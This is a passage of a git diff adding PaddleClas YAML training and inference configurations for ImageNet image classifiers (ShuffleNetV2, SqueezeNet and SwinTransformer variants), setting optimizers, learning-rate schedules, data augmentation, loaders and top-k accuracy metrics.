Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.25 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x2_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x2_0.yaml new file mode 100644 index 0000000..c871ec7 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x2_0.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ShuffleNetV2_x2_0 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.25 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SqueezeNet/SqueezeNet1_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SqueezeNet/SqueezeNet1_0.yaml new file mode 100644 index 0000000..0f5d972 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SqueezeNet/SqueezeNet1_0.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: SqueezeNet1_0 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.02 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SqueezeNet/SqueezeNet1_1.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SqueezeNet/SqueezeNet1_1.yaml new file mode 100644 index 0000000..1f23922 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SqueezeNet/SqueezeNet1_1.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: SqueezeNet1_1 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.02 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_base_patch4_window12_384.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_base_patch4_window12_384.yaml new file mode 100644 index 0000000..5d976c0 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_base_patch4_window12_384.yaml @@ -0,0 +1,159 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 384, 384] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: SwinTransformer_base_patch4_window12_384 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: absolute_pos_embed relative_position_bias_table .bias norm + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 20 + warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 384 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 438 + interpolation: bicubic + backend: pil + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 438 + interpolation: bicubic + backend: pil + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_base_patch4_window7_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_base_patch4_window7_224.yaml new file mode 100644 index 0000000..efbd427 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_base_patch4_window7_224.yaml @@ -0,0 +1,159 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: SwinTransformer_base_patch4_window7_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: absolute_pos_embed relative_position_bias_table .bias norm + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 20 + warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_large_patch4_window12_384.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_large_patch4_window12_384.yaml new file mode 100644 index 0000000..6c3abe6 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_large_patch4_window12_384.yaml @@ -0,0 +1,159 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 384, 384] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: SwinTransformer_large_patch4_window12_384 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: absolute_pos_embed relative_position_bias_table .bias norm + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 20 + warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 384 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 438 + interpolation: bicubic + backend: pil + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 438 + interpolation: bicubic + backend: pil + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_large_patch4_window7_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_large_patch4_window7_224.yaml new file mode 100644 index 0000000..dd2b2ac --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_large_patch4_window7_224.yaml @@ -0,0 +1,159 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: SwinTransformer_large_patch4_window7_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: absolute_pos_embed relative_position_bias_table .bias norm + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 20 + warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_small_patch4_window7_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_small_patch4_window7_224.yaml new file mode 100644 index 0000000..34a80d8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_small_patch4_window7_224.yaml @@ -0,0 +1,159 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: SwinTransformer_small_patch4_window7_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: absolute_pos_embed relative_position_bias_table .bias norm + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 20 + warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_tiny_patch4_window7_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_tiny_patch4_window7_224.yaml new file mode 100644 index 0000000..d921593 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_tiny_patch4_window7_224.yaml @@ -0,0 +1,159 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: SwinTransformer_tiny_patch4_window7_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: absolute_pos_embed relative_position_bias_table .bias norm + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 20 + warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + 